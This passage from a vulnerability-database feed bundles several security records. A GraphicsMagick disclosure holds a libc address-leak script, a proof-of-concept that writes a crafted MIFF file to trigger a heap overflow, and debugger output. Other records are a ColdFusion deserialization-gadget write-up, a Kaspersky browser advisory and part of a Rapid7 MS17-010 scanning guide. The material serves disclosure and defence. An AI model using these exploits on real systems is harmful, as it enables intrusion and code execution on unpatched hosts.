\noutput_leak = p.recvall() \npriority_offset = output_leak.index(\"Priority:\") + 12 \nmontage_offset = output_leak.index(\"Montage:\") - 3 \nleak = output_leak[priority_offset:montage_offset] \nif \"0x00000000\" in leak: \nlog.info(\"Unlucky run. Value corrupted by StringToList\") \nexit() \nmain_arena_leak = u64(leak.ljust(8, \"\\x00\")) \nlog.info(\"Main Arena Leak: 0x%x\" % main_arena_leak) \nlibc_base = main_arena_leak - libc_main_arena_entry_offset \nlog.info(\"libc Base: 0x%x\" % libc_base) \n \nif __name__ == \"__main__\": \nmain() \n \n \nHeap Overflow \nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file. \n \nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name. \n \n844 /* \n845 Display visual image directory. \n846 */ \n847 image_info=CloneImageInfo((ImageInfo *) NULL); \n848 (void) CloneString(&image_info->size,\"64x64\"); \n849 (void) fprintf(file,\" Directory:\\n\"); \n850 for (p=image->directory; *p != '\\0'; p++) \n851 { \n852 q=p; \n853 while ((*q != '\\n') && (*q != '\\0')) \n854 q++; \n855 (void) strncpy(image_info->filename,p,q-p); \n856 image_info->filename[q-p]='\\0'; \n857 p=q; \n... \n880 } \n881 DestroyImageInfo(image_info); \n \nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name. \n \n \ntype = struct _ImageInfo { \n... \nFILE *file; \nchar magick[2053]; \nchar filename[2053]; \n_CacheInfoPtr_ cache; \nvoid *definitions; \nImage *attributes; \nunsigned int ping; \nPreviewType preview_type; \nunsigned int affirm; \n_BlobInfoPtr_ blob; \nsize_t length; \nchar unique[2053]; \nchar zero[2053]; \nunsigned long signature; \n} \n \nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag. \n \nProof of Concept \nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff. \n''' \n \n#!/usr/bin/python \n \nfrom pwn import * \n \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' + \n':\\x1a', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"exploit.miff\" \n \ndef main(): \npayload = \"A\"*10000 \npayload = partitions[0] + payload + partitions[1] \nfile(output, \"w\").write(payload) \n \nif __name__ == \"__main__\": \nmain() \n \n''' \nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful. \n \n \ngefa$? r identify -verbose exploit.miff \n... \ngefa$? br describe.c:856 \nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856. \n... \ngefa$? p *image_info \n$3 = { \n... \ncompression = UndefinedCompression, \nfile = 0x0, \nmagick = '\\000' <repeats 2052 times>, \nfilename = 'A' <repeats 2053 times>, \ncache = 0x4141414141414141, \ndefinitions = 0x4141414141414141, \nattributes = 0x4141414141414141, \nping = 0x41414141, \npreview_type = 1094795585, \naffirm = 0x41414141, \nblob = 0x4141414141414141, \nlength = 0x4141414141414141, \nunique = 'A' <repeats 2053 times>, \nzero = 'A' <repeats 2053 times>, \nsignature = 0x4141414141414141 \n} \n''' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144878/graphicsmagick-discloseoverflow.txt"}], "seebug": [{"lastseen": "2018-03-31T18:25:41", "bulletinFamily": "exploit", "description": "### Exploiting Adobe ColdFusion before CVE-2017-3066\r\nIn a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me whether I had an idea how he could still get a SYSTEM shell and the outcome of the short research effort is documented here.\r\n\r\n### INTRODUCTION ADOBE COLDFUSION & AMF\r\nBefore we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an Application Development Platform like ASP.net, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).\r\n\r\nThe AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies. Several data types are supported in AMF0 and AMF3. For example the AMF3 format supports the following protocol elements with their type identifier:\r\n```\r\nUndefined - 0x00\r\nNull - 0x01\r\nBoolean - 0x02\r\nBoolean - 0x03\r\nInteger - 0x04\r\nDouble - 0x05\r\nString - 0x06\r\nXML - 0x07\r\nDate - 0x08\r\nArray - 0x09\r\nObject - 0x0A\r\nXML End - 0x0B\r\nByteArray - 0x0C\r\n```\r\n\r\nDetails about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see https://en.wikipedia.org/wiki/Action_Message_Format).\r\n\r\nThere are several implementations for AMF in different languages. For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used in Adobe ColdFusion.\r\n\r\nThe BlazeDS AMF serializer can serialize complex object graphs. The serializer starts with the root object and serializes its members recursively.\r\n\r\nTwo general serialization techniques are supported by BlazeDS to serialize complex objects:\r\n* Serialization of Bean Properties (AMF0 and AMF3)\r\n* Serialization using Java's java.io.Externalizable interface. (AMF3)\r\n\r\n### Serialization of Bean Properties\r\nThis technique requires the object to be serialized to have a public no-arg constructor and for every member public Getter-and Setter-Methods (JavaBeans convention).\r\n\r\nIn order to collect all member values of an object, the AMF serializer invokes all Getter-methods during serialization. The member names and values are put in the Action message body with the class name of the object.\r\n\r\nDuring deserialization, the classname is taken from the Action Message, a new object is constructed and for every member name the corresponding set method is called with the value as argument. This all happens either in method readScriptObject() of class flex.messaging.io.amf.Amf3Input or readObjectValue() of class flex.messaging.io.amf.Amf0Input.\r\n\r\n### Serialization using Java's java.io.Externalizable interface\r\nBlazeDS further supports serialization of complex objects of classes implementing the java.io.Externalizable interface which inherits from java.io.Serializable.\r\n```\r\npublic abstract interface Externalizable\r\n extends Serializable\r\n{\r\n public abstract void writeExternal(ObjectOutput paramObjectOutput)\r\n throws IOException;\r\n\r\n public abstract void readExternal(ObjectInput paramObjectInput)\r\n throws IOException, ClassNotFoundException;\r\n}\r\n```\r\n\r\nEvery class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput-implementation to read serialized primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).\r\n\r\nDuring deserialization of an object (type 0xa) in AMF3, the method readScriptObject() of class flex.messaging.io.amf.Amf3Input gets called. In line #759 the method readExternalizable is invoked which calls the readExternal() method on the object to be deserialized.\r\n```\r\n/* */ protected Object readScriptObject()\r\n/* */ throws ClassNotFoundException, IOException\r\n/* */ {\r\n/* 736 */ int ref = readUInt29();\r\n/* */ \r\n/* 738 */ if ((ref & 0x1) == 0) {\r\n/* 739 */ return getObjectReference(ref >> 1);\r\n/* */ }\r\n/* 741 */ TraitsInfo ti = readTraits(ref);\r\n/* 742 */ String className = ti.getClassName();\r\n/* 743 */ boolean externalizable = ti.isExternalizable();\r\n/* */ \r\n/* */\r\n/* */\r\n/* 747 */ Object[] params = { className, null };\r\n/* 748 */ Object object = createObjectInstance(params);\r\n/* */ \r\n/* */\r\n/* 751 */ className = (String)params[0];\r\n/* 752 */ PropertyProxy proxy = (PropertyProxy)params[1];\r\n/* */ \r\n/* */\r\n/* 755 */ int objectId = rememberObject(object);\r\n/* */ \r\n/* 757 */ if (externalizable)\r\n/* */ {\r\n/* 759 */ readExternalizable(className, object); //<- call to readExternal\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nThis should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.\r\n\r\n### PREVIOUS WORK\r\nChris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.\r\n\r\nWouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.\r\n\r\nLooking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.\r\n\r\nThe most recent ones are:\r\n* Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)\r\n* XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)\r\n* XXE (CVE-2016-4264 by @dawid_golunski)\r\n\r\n### CVE-2017-3066\r\nIn 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered independently the vulnerability CVE-2017-3066 in Apache BlazeDS.\r\n\r\nThe core problem of this vulnerability was that Adobe Coldfusion never did any whitelisting of allowed classes. Thus any class in the classpath of Adobe ColdFusion, which either fulfills the Java Beans Convention or implements java.io.Externalizable could be sent to the server and get deserialized. Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface and triggered an outgoing TCP connection during AMF3 deserialization. After the connection was made to the attacker's server, its response was deserialized using Java's native deserialization using ObjectInputStream.readObject().\r\n\r\nBoth found a great \"bridge\" from AMF deserialization to Java's native deserialization which offers well known exploitation primitives using public gadgets. Details about the vulnerability can also be found in Markus' blog post. \r\n\r\nApache introduced validation through the class flex.messaging.validators.ClassDeserializationValidator. It has a default whitelist but can also be configured with a configuration file. For details see the Apache BlazeDS release notes.\r\n\r\n### FINDING EXPLOITATION PRIMITIVES BEFORE CVE-2017-3066\r\nAs already mentioned in the very beginning my teammate Thomas required an exploit which also works without outgoing connection.\r\n\r\nI had a quick look into the excellent research paper \"Java Unmarshaller Security\" of Moritz Bechler where he analysed several \"Unmarshallers\" including BlazeDS. The exploitation payloads he discovered weren't applicable since the libraries were missing in the classpath.\r\n\r\nSo I started with my typical approach, fired up my favorite \"reverse engineering tool\" when it comes to Java, Eclipse. Eclipse together with the powerful decompiler plugin \"JD-Eclipse\" (https://github.com/java-decompiler/jd-eclipse) is all you need for static and dynamic analysis. As a former Dev I was used to work with IDE's which make your life easier and decompiling and grepping through code is often very inefficient and error prone. So I created a new Java project and added all jar-files of Adobe Coldfusion 12 as external libraries.\r\n\r\nThe first idea was to look for further calls to Java's ObjectInputStream.readObject-method. Using Eclipse this is very easy. Just open class ObjectInputStream, right click on the readObject() method and click \"Open Call Hierarchy\". Thanks to JD-Eclipse and its decompiler, Eclipse is able to construct call graphs based on class information without having any source. The call graph looks big in the very beginning. But with some experience you see very quickly which nodes in the graph are interesting.\r\n\r\nAfter some hours I found two promising call graphs.\r\n\r\n### SETTER-BASED EXPLOIT\r\nThe first one starts with method setState(byte[] new_state) of class org.jgroups.blocks.ReplicatedTree.\r\n\r\n![](https://images.seebug.org/1522379796392)\r\n\r\n\r\nLooking at the implementation of this method, we already can imagine what is happening in line #605.\r\n```\r\n/* */ public void setState(byte[] new_state)\r\n/* */ {\r\n/* 597 */ Node new_root = null;\r\n/* */ \r\n/* */\r\n/* 600 */ if (new_state == null) {\r\n/* 601 */ if (log.isInfoEnabled()) log.info(\"new cache is null\");\r\n/* 602 */ return;\r\n/* */ }\r\n/* */ try {\r\n/* 605 */ Object obj = Util.objectFromByteBuffer(new_state);\r\n/* 606 */ new_root = (Node)((Node)obj).clone();\r\n/* 607 */ root = new_root;\r\n/* 608 */ notifyAllNodesCreated(root);\r\n/* */ }\r\n/* */ catch (Throwable ex) {\r\n/* 611 */ if (log.isErrorEnabled()) { log.error(\"could not set cache: \" + ex);\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\nA quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().\r\n\r\nThe only thing to mention here is that the byte[] passed to setState() needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364 of class org.jgroups.util.Util.\r\n```\r\n/* */ public static Object objectFromByteBuffer(byte[] buffer, int offset, int length) throws Exception\r\n/* */ {\r\n/* 358 */ if (buffer == null) return null;\r\n/* 359 */ if (JGROUPS_COMPAT)\r\n/* 360 */ return oldObjectFromByteBuffer(buffer, offset, length);\r\n/* 361 */ Object retval = null;\r\n/* 362 */ InputStream in = null;\r\n/* 363 */ ByteArrayInputStream in_stream = new ByteArrayInputStream(buffer, offset, length);\r\n/* 364 */ byte b = (byte)in_stream.read();\r\n/* */ try {\r\n/* */ int len;\r\n/* 367 */ switch (b) {\r\n/* */ case 0:\r\n/* 369 */ return null;\r\n/* */ case 1:\r\n/* 371 */ in = new DataInputStream(in_stream);\r\n/* 372 */ retval = readGenericStreamable((DataInputStream)in);\r\n/* 373 */ break;\r\n/* */ case 2:\r\n/* 375 */ in = new ObjectInputStream(in_stream);\r\n/* 376 */ retval = ((ObjectInputStream)in).readObject();\r\n/* */ //...\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\n\r\nThe exploit can be found in the following image.\r\n\r\n![](https://images.seebug.org/1522379830922)\r\n\r\nThe exploit works against Adobe ColdFusion 12 only since JGroups is only available in this specific version.\r\n\r\n### EXTERNALIZABLE-BASED EXPLOIT\r\nThe second call graph starts in class org.apache.axis2.util.MetaDataEntry with a call to readExternal which is what we are looking for.\r\n\r\n![](https://images.seebug.org/1522379858812)\r\n\r\n\r\nIn line #297 we have a call to SafeObjectInputStream.install(inObject).\r\n```\r\n/* */ public static SafeObjectInputStream install(ObjectInput in)\r\n/* */ {\r\n/* 62 */ if ((in instanceof SafeObjectInputStream)) {\r\n/* 63 */ return (SafeObjectInputStream)in;\r\n/* */ }\r\n/* 65 */ return new SafeObjectInputStream(in) ;\r\n/* */ }\r\nview rawsnippet_org.apache.axis2.context.externalize.SafeObjectInputStream.java hosted with \u2764 by GitHub\r\nIn this function our AMF3Input instance gets wrapped by a org.apache.axis2.context.externalize.SafeObjectInputStream instance.\r\n/* */ private Object readObjectOverride()\r\n/* */ throws IOException, ClassNotFoundException\r\n/* */ {\r\n/* 318 */ boolean isActive = in.readBoolean();\r\n/* 319 */ if (!isActive) {\r\n/* 320 */ if (isDebug) {\r\n/* 321 */ log.debug(\"Read object=null\");\r\n/* */ }\r\n/* 323 */ return null;\r\n/* */ }\r\n/* 325 */ Object obj = null;\r\n/* 326 */ boolean isObjectForm = in.readBoolean();\r\n/* 327 */ if (isObjectForm)\r\n/* */ {\r\n/* 329 */ if (isDebug) {\r\n/* 330 */ log.debug(\" reading using object form\");\r\n/* */ }\r\n/* 332 */ obj = in.readObject();\r\n/* */ } else {\r\n/* 334 */ if (isDebug) {\r\n/* 335 */ log.debug(\" reading using byte form\");\r\n/* */ }\r\n/* */ \r\n/* 338 */ ByteArrayInputStream bais = getByteStream(in);\r\n/* */ \r\n/* */\r\n/* 341 */ ObjectInputStream tempOIS = createObjectInputStream(bais);\r\n/* 342 */ obj = tempOIS.readObject();\r\n/* 343 */ tempOIS.close();\r\n/* 344 */ bais.close();\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nIn line #341 a new instance of class org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created. This class just extends the standard java.io.ObjectInputStream. In line #342 we finally have our call to readObject().\r\nThe following image shows the request for the exploit. \r\n\r\n![](https://images.seebug.org/1522379893889)\r\n\r\nThe exploit works against Adobe ColdFusion 11 and 12. \r\n\r\n### COLDFUSIONPWN\r\nTo make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.\r\n\r\n### TAKEAWAYS\r\nDeserializing untrusted input is bad, that's for sure. From an exploiters perspective exploiting deserialization vulnerabilities is a challenging task since you need to find the \"right\" objects (gadgets) which trigger functionality you can reuse for exploitation. But it's also more fun :-)\r\n\r\nBy the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization vulnerabilities and how to do proper static and dynamic analysis in Java, you might be interested in our upcoming \"Advanced Java Exploitation\" course.", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97208", "id": "SSV:97208", "title": "Adobe ColdFusion \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2017-3066\uff09", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "kaspersky": [{"lastseen": "2019-03-21T00:14:48", "bulletinFamily": "info", "description": "### *Detect date*:\n09/12/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, bypass security restrictions and spoof user interface.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions 9 through 11 \nMicrosoft Edge\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8756>) \n[CVE-2017-8747](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8747>) \n[CVE-2017-8734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8734>) \n[CVE-2017-8729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8729>) \n[CVE-2017-8728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8728>) \n[CVE-2017-8757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8757>) \n[CVE-2017-8749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8749>) \n[CVE-2017-8738](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8738>) \n[CVE-2017-11766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11766>) \n[CVE-2017-8750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8750>) \n[CVE-2017-8731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8731>) \n[CVE-2017-8753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8753>) \n[CVE-2017-8723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8723>) \n[CVE-2017-8724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8724>) \n[CVE-2017-8741](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8741>) \n[CVE-2017-8754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8754>) \n[CVE-2017-8740](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8740>) \n[CVE-2017-8752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8752>) \n[CVE-2017-8597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8597>) \n[CVE-2017-8660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8660>) \n[CVE-2017-8736](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8736>) \n[CVE-2017-11764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11764>) \n[CVE-2017-8643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8643>) \n[CVE-2017-8751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8751>) \n[CVE-2017-8649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8649>) \n[CVE-2017-8748](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8748>) \n[CVE-2017-8755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8755>) \n[CVE-2017-8737](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8737>) \n[CVE-2017-8648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8648>) \n[CVE-2017-8739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8739>) \n[CVE-2017-8735](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8735>) \n[CVE-2017-8733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8733>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8756](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8756>)7.6High \n[CVE-2017-8747](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8747>)7.6High \n[CVE-2017-8734](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8734>)7.6High \n[CVE-2017-8729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8729>)7.6High \n[CVE-2017-8728](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8728>)7.6High \n[CVE-2017-8757](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8757>)7.6High \n[CVE-2017-8749](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8749>)7.6High \n[CVE-2017-8738](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8738>)7.6High \n[CVE-2017-11766](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11766>)7.6High \n[CVE-2017-8750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8750>)7.6High \n[CVE-2017-8731](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8731>)7.6High \n[CVE-2017-8753](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8753>)7.6High \n[CVE-2017-8723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8723>)4.3High \n[CVE-2017-8724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8724>)4.3High \n[CVE-2017-8741](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8741>)7.6High \n[CVE-2017-8754](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8754>)4.0High \n[CVE-2017-8740](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8740>)7.6High \n[CVE-2017-8752](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8752>)7.6High \n[CVE-2017-8597](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8597>)4.3High \n[CVE-2017-8660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8660>)9.3High \n[CVE-2017-8736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8736>)4.3High \n[CVE-2017-11764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11764>)7.6High \n[CVE-2017-8643](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8643>)4.3High \n[CVE-2017-8751](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8751>)7.6High \n[CVE-2017-8649](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8649>)7.6High \n[CVE-2017-8748](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8748>)7.6High \n[CVE-2017-8755](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8755>)7.6High \n[CVE-2017-8737](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8737>)7.6High \n[CVE-2017-8648](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8648>)4.3High \n[CVE-2017-8739](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8739>)4.3High \n[CVE-2017-8735](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8735>)4.3High \n[CVE-2017-8733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8733>)4.3High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038792](<http://support.microsoft.com/kb/4038792>) \n[4038799](<http://support.microsoft.com/kb/4038799>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4038777](<http://support.microsoft.com/kb/4038777>) \n[4036586](<http://support.microsoft.com/kb/4036586>)", "modified": "2019-03-07T00:00:00", "published": "2017-09-12T00:00:00", "id": "KLA11098", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11098", "title": "\r KLA11098Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7community": [{"lastseen": "2017-08-03T17:21:32", "bulletinFamily": "blog", "description": "<div class=\"jive-rendered-content\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. It is believed that the ransomworm achieved its initial infection via a compromised software update, and that it then leverages the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue </a>and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\">DoublePulsar </a>exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">WannaCry</a> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities. For the latest updates on this ransomworm, please see Rapid7’s <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\">recommended actions</a>. To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. <h2 dir=\"ltr\">Creating a Scan Template</h2>The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 is as follows:1.  Under the Administration tab, go to Templates > Manage Templates <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a>  2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description. <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\" <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 4. Add Check “<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\">MS17-010</a>” and click Save: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> This should return checks that are related to MS17-010. The related CVEs are:<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0143</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0144</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" 